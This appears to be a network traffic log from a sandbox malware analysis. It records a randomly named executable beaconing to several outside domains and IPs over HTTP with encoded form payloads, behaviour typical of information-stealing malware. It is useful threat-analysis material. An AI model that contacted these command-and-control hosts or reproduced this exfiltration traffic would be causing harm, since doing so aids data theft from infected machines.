32 6f 44 67 78 44 57 33 37 2b 70 6b 6a 70 43 70 65 7a 38 45 61 44 35 39 4d 7a 6d 63 38 4b 61 47 4b 33 33 68 45 69 62 38 33 36 30 52 6a 6f 61 50 56 30 4a 53 47 35 33 57 58 75 79 56 66 32 76 4c 4e 58 76 78 69 76 74 39 32 71 2f 6b 66 6d 52 63 38 47 66 56 78 39 53 36 30 4b 6e 52 77 52 7a 36 2f 54 6a 47 50 57 72 35 72 48 4b 56 42 4b 6d 6a 45 72 46 2f 76 4c 47 36 43 2f 4f 51 43 66 53 58 39 4e 77 4d 42 73 30 34 36 30 56 79 46 55 48 50 42 2f 58 62 4f 6f 6c 39 63 54 57 32 67 71 72 39 73 75 44 78 4c 79 70 69 50 54 [TRUNCATED] Data Ascii: DX3L=xsl0iuCRC/hk4gBDU2dP2LbVu30fysAvsnSudp2MTPI2KZln5SoRmTnriDZgDquG+XDaJvw4j31NFSQJPEa60nk6n78QKSmPaXY16kubh/Y7GpKqHNQPi7yRlJ/Pz3ySBExrVqYzAqIKovQQdYnAkyrFnk8vTXgOX0k2oDgxDW37+pkjpCpez8EaD59Mzmc8KaGK33hEib8360RjoaPV0JSG53WXuyVf2vLNXvxivt92q/kfmRc8GfVx9S60KnRwRz6/TjGPWr5rHKVBKmjErF/vLG6C/OQCfSX9NwMBs0460VyFUHPB/XbOol9cTW2gqr9suDxLypiPTZRjRh/8O0cr55dQpyYH7xnwcf73ghCp3mRRYKv3LI5U5/eh7MlyEwuDwPpeeWRr9/yL9wYWRNJpbOv7NZhQEYEvTvb+UhRtEBPZm4oKjcUbiBwa55NKhXxgYDWNM9eDPldugfmg0H1kY2FVHk3zUexJVNr0FmfrsxKWZZdRZDND0xR43pMxGdg4PeNU1hl9vXnuCUr4ilHPgsGEx6ecg9aSGJ5JDENCRpO/9CkhJOSKLmUstnLB+T2vzSxogkgx5PD3lI6eGMlR0x09lWtUZaWbqnDNZXXWPSa7ZWuOnPWWdwuE9kcT8dLmsU6dixzjeKWFcsrlRlgM4J4dps6jnmOpB67h4Jt09DfLHbEaTBfbhElBp95WtR2yBKWyr3AwX4X2xYyxaWFdjgyQkia9tKs3pg55GKm/sgU5BQjsgE3LqNv8ovVb51hOzXdbVsB/qKhywr7PxMPjBmrXRIqV+vmnQz5EhM2Xia+VGLhFNaFc6YpBW2kg9FWlBVFX1QR9bNmDVtawWzKn8uCtL2f3TqWroqLu+rW0LZkvpPaOBWApYd+OI8MCpCZcoGe8EoWIBYueicvKRYAi8mQfhRKzVzRyuIJeKBbxCzAME10e47FkidAfSeiI0PRVIvRvxD/4C8HkH69NHG/b3jZCRKgCI1c1OO7+vV+OQ4v [TRUNCATED]
Oct 10, 2024 14:12:55.759474039 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 10 Oct 2024 12:12:55 GMT Connection: close Content-Length: 4954 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 10, 2024 14:12:55.759514093 CEST	224	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
Oct 10, 2024 14:12:55.759566069 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
Oct 10, 2024 14:12:55.759598970 CEST	1236	IN	Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
Oct 10, 2024 14:12:55.759632111 CEST	1236	IN	Data Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x80070002</td></tr> </table> </div> <div id="details-right">
Oct 10, 2024 14:12:55.759666920 CEST	5	IN	Data Raw: 6d 6c 3e 20 0a Data Ascii: ml>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49752	62.149.128.40	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:12:57.622734070 CEST	521	OUT	GET /sumy/?DX3L=8uNUhaiSR/1/jShpTjhrq7Pmn2ok3vFsrk+NeNeMT9gsX+dRqQojmTXAgjpwTcKCwG3dOpoH/XUFLyUWF1WG3kwUjYogFhCYahwErm+e78ofLc2PLMFplIY=&GHcxP=10HpjR HTTP/1.1 Host: www.admaioraluxury.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:12:58.299485922 CEST	1236	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 10 Oct 2024 12:12:57 GMT Connection: close Content-Length: 5097 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 10, 2024 14:12:58.299537897 CEST	1236	IN	Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Oct 10, 2024 14:12:58.299572945 CEST	1236	IN	Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Oct 10, 2024 14:12:58.299604893 CEST	1236	IN	Data Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>   IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandl
Oct 10, 2024 14:12:58.299638987 CEST	372	IN	Data Raw: 74 61 69 6e 65 72 22 3e 20 0a 20 3c 66 69 65 6c 64 73 65 74 3e 3c 68 34 3e 4d 6f 72 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 54 68 69 73 20 65 72 72 6f 72 20 6d 65 61 6e 73 20 74 68 61 74 20 74 68 65 20 66 69 6c 65 20 Data Ascii: tainer"> <fieldset><h4>More Information:</h4> This error means that the file or directory does not exist on the server. Create the file or directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49793	185.99.134.9	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:03.728096008 CEST	783	OUT	POST /oesh/ HTTP/1.1 Host: www.tyc01054.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.tyc01054.top Referer: http://www.tyc01054.top/oesh/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 4b 41 30 61 35 48 44 6e 6b 65 4e 48 72 6e 62 61 34 47 49 61 57 39 64 2b 50 65 57 6b 62 32 35 4b 79 43 34 37 62 4e 71 6b 47 30 41 62 6a 74 57 54 30 62 33 52 6d 73 4d 44 59 54 4f 73 56 51 42 52 74 57 57 41 4d 46 30 6a 73 52 39 73 44 67 6e 74 58 68 43 6b 50 44 6c 67 66 69 33 61 34 43 71 6b 4b 71 42 4d 34 71 51 54 79 69 2f 43 54 48 2f 4d 30 6d 63 63 72 73 67 73 38 6f 41 37 6a 2f 71 65 4c 71 77 66 2b 71 2b 62 37 5a 71 65 49 37 32 30 6a 71 67 42 6a 35 77 70 4f 71 41 45 4f 30 33 33 59 5a 66 50 53 49 6c 68 2b 68 58 56 74 65 4b 71 75 37 59 67 6a 37 36 68 4a 4c 74 71 4e 6c 65 71 69 41 3d 3d Data Ascii: DX3L=KA0a5HDnkeNHrnba4GIaW9d+PeWkb25KyC47bNqkG0AbjtWT0b3RmsMDYTOsVQBRtWWAMF0jsR9sDgntXhCkPDlgfi3a4CqkKqBM4qQTyi/CTH/M0mccrsgs8oA7j/qeLqwf+q+b7ZqeI720jqgBj5wpOqAEO033YZfPSIlh+hXVteKqu7Ygj76hJLtqNleqiA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49806	185.99.134.9	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:06.267926931 CEST	803	OUT	POST /oesh/ HTTP/1.1 Host: www.tyc01054.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.tyc01054.top Referer: http://www.tyc01054.top/oesh/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 4b 41 30 61 35 48 44 6e 6b 65 4e 48 71 48 72 61 39 6c 51 61 64 39 64 39 43 4f 57 6b 51 57 35 4f 79 43 38 37 62 4d 76 68 46 47 30 62 6a 49 71 54 6d 61 33 52 68 73 4d 44 58 7a 4f 70 61 77 42 59 74 57 54 67 4d 41 55 6a 73 58 52 73 44 6c 6a 74 58 57 57 72 4f 54 6c 75 58 43 33 59 6c 79 71 6b 4b 71 42 4d 34 72 30 39 79 6d 62 43 51 30 6e 4d 37 6e 63 62 6c 4d 67 72 39 6f 41 37 30 76 71 61 4c 71 77 68 2b 72 53 69 37 66 6d 65 49 2b 53 30 6e 76 55 43 74 4a 77 76 4b 71 41 52 4a 48 4c 79 42 71 4f 53 61 4c 46 35 78 7a 4c 32 6c 34 62 77 2f 4b 35 33 78 37 65 53 55 4d 6b 65 41 6d 6a 6a 35 49 65 4b 79 57 4f 50 51 42 38 5a 54 58 4b 69 75 56 6f 4d 2b 58 6b 3d Data Ascii: DX3L=KA0a5HDnkeNHqHra9lQad9d9COWkQW5OyC87bMvhFG0bjIqTma3RhsMDXzOpawBYtWTgMAUjsXRsDljtXWWrOTluXC3YlyqkKqBM4r09ymbCQ0nM7ncblMgr9oA70vqaLqwh+rSi7fmeI+S0nvUCtJwvKqARJHLyBqOSaLF5xzL2l4bw/K53x7eSUMkeAmjj5IeKyWOPQB8ZTXKiuVoM+Xk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49822	185.99.134.9	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:08.810748100 CEST	10885	OUT	POST /oesh/ HTTP/1.1 Host: www.tyc01054.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.tyc01054.top Referer: http://www.tyc01054.top/oesh/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 4b 41 30 61 35 48 44 6e 6b 65 4e 48 71 48 72 61 39 6c 51 61 64 39 64 39 43 4f 57 6b 51 57 35 4f 79 43 38 37 62 4d 76 68 46 47 73 62 67 36 53 54 30 35 66 52 67 73 4d 44 65 54 4f 6f 61 77 41 59 74 58 33 73 4d 41 51 7a 73 53 4e 73 43 44 66 74 52 6e 57 72 41 54 6c 75 62 69 33 62 34 43 71 4c 4b 71 51 46 34 72 6b 39 79 6d 62 43 51 31 58 4d 2f 32 63 62 31 38 67 73 38 6f 41 4a 6a 2f 71 2b 4c 71 6f 78 2b 72 57 74 37 76 47 65 4a 65 69 30 68 4a 49 43 72 5a 77 74 4e 71 42 55 4a 48 47 69 42 73 71 65 61 4b 68 44 78 78 58 32 68 70 69 4d 6b 59 73 6f 6c 35 4b 33 51 62 38 72 4e 30 2f 32 30 2b 2b 4d 2f 47 57 76 4b 7a 4e 31 4f 47 33 75 2f 6b 30 76 70 68 51 75 6e 6b 6b 43 61 78 4f 75 2b 42 4d 32 72 46 68 77 46 4b 6e 36 61 69 4c 53 71 56 6a 2f 74 43 55 38 48 4d 6f 6a 6e 6e 69 50 49 4d 4b 4b 77 2f 63 6a 65 4d 75 56 54 64 50 65 62 4e 64 4d 4d 4a 48 73 63 48 6b 59 39 55 69 70 67 6b 64 41 61 56 44 4b 31 6d 33 74 7a 58 66 2b 6d 67 53 46 4f 51 2b 70 6a 59 79 38 75 2f 79 78 54 37 45 6b 6e 7a 41 59 73 30 63 55 63 [TRUNCATED] Data Ascii: DX3L=KA0a5HDnkeNHqHra9lQad9d9COWkQW5OyC87bMvhFGsbg6ST05fRgsMDeTOoawAYtX3sMAQzsSNsCDftRnWrATlubi3b4CqLKqQF4rk9ymbCQ1XM/2cb18gs8oAJj/q+Lqox+rWt7vGeJei0hJICrZwtNqBUJHGiBsqeaKhDxxX2hpiMkYsol5K3Qb8rN0/20++M/GWvKzN1OG3u/k0vphQunkkCaxOu+BM2rFhwFKn6aiLSqVj/tCU8HMojnniPIMKKw/cjeMuVTdPebNdMMJHscHkY9UipgkdAaVDK1m3tzXf+mgSFOQ+pjYy8u/yxT7EknzAYs0cUc5LVLftLIv2/QJALFJHSK7AkSn+ttzWguvMST55TA+o6w7rWtbsf9yGlauwputJ6IC47Lry70Mqe0egCdSYG2yLZeZR17rVwKp+f76RUSaWSVsKBsYBI3W7y5n4dQwRHjkrdwD6ZG8oiWeVofANGKqUlJTKk22NYiCb2OMiLREmWd6TsLtQ2Th972j/4h3odtqUcr6tOhLQ2JmlDrkvkvShblib8dAF0l/h3OVaUBoA/JaYFa3Vhiv/0MslPSECRZwbckAJjEKlb956Wk0cmpMKAewLdPwKm7J8h2q3iHoeIAJYVCWrADZFScMelkx1F9qCZABPzQ6kAUneqyCJffNTxSayWzSlZITTIaU0YFIXzB4aJlVXqe8B7QfAmKB792M/gGVDBTyBotjZXdTEfKDOTzxdA/CbNivUGvivS7SjesqTCHW6TbjkOeLvNy/hgb7MY99VIGk3MehcutX4BhvWK1Noi+HMRsIe7tTNPphIHJKkWzRBF4OurZ792GyGiqJIviE3UG+SlezgGiyK5K7+2+E87R71Sswi/22egSgHoghvO77AV6Ve0Eesyg82Sxm1nRNt5D3KkUL81mr1bktGpFym+5PnKlg35W0rVMPpuY/XXuCCQ0vuqGMqvZX1kvazvrszgnN2/d5lMXvWYO/KJRMlQWDx8JjH [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49838	185.99.134.9	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:11.370609045 CEST	515	OUT	GET /oesh/?GHcxP=10HpjR&DX3L=HCc66xuFwsYaoV7p1lMXVJ1POfLKV24vpmMkT+/QNEwp4qKgnbX1o8A6WiOmDTIb5Dz6WGc//wMiFSP8UWm4ITpofh+nmR+jMbFHhJ0Xuj7SUgPN0FkAu9U= HTTP/1.1 Host: www.tyc01054.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49994	217.76.128.34	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:37.913531065 CEST	789	OUT	POST /0cl8/ HTTP/1.1 Host: www.le-pier.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.le-pier.online Referer: http://www.le-pier.online/0cl8/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 32 46 5a 69 54 70 43 6a 7a 34 57 6a 34 6d 70 51 6e 77 30 69 63 79 79 4c 6e 35 4c 35 33 4d 71 6c 36 2b 38 49 4b 42 30 4b 56 79 58 6f 62 64 2b 67 7a 66 41 6e 75 43 6a 36 42 63 30 6d 69 4f 4a 6c 2f 5a 66 4c 77 2b 6b 6c 65 72 4a 79 70 47 5a 56 4d 63 35 49 48 7a 47 68 66 74 66 6e 55 42 6e 79 43 6a 5a 70 5a 67 33 69 4a 30 33 34 2b 4a 45 4f 78 35 2b 79 36 4b 4a 56 6b 6b 65 38 38 4f 53 2f 44 53 4c 34 4c 6b 56 47 69 74 6c 53 55 52 7a 51 63 58 36 35 71 68 59 35 77 52 37 4b 72 70 76 43 36 39 73 78 79 6e 35 59 4b 4d 65 61 38 36 38 44 41 48 56 6e 68 56 51 30 77 6b 4a 56 53 38 41 55 5a 77 3d 3d Data Ascii: DX3L=2FZiTpCjz4Wj4mpQnw0icyyLn5L53Mql6+8IKB0KVyXobd+gzfAnuCj6Bc0miOJl/ZfLw+klerJypGZVMc5IHzGhftfnUBnyCjZpZg3iJ034+JEOx5+y6KJVkke88OS/DSL4LkVGitlSURzQcX65qhY5wR7KrpvC69sxyn5YKMea868DAHVnhVQ0wkJVS8AUZw==
Oct 10, 2024 14:13:38.587201118 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Oct 2024 12:13:38 GMT Server: Apache X-ServerIndex: llim603 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 65 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 2d 70 69 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 [TRUNCATED] Data Ascii: 1eb0<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; 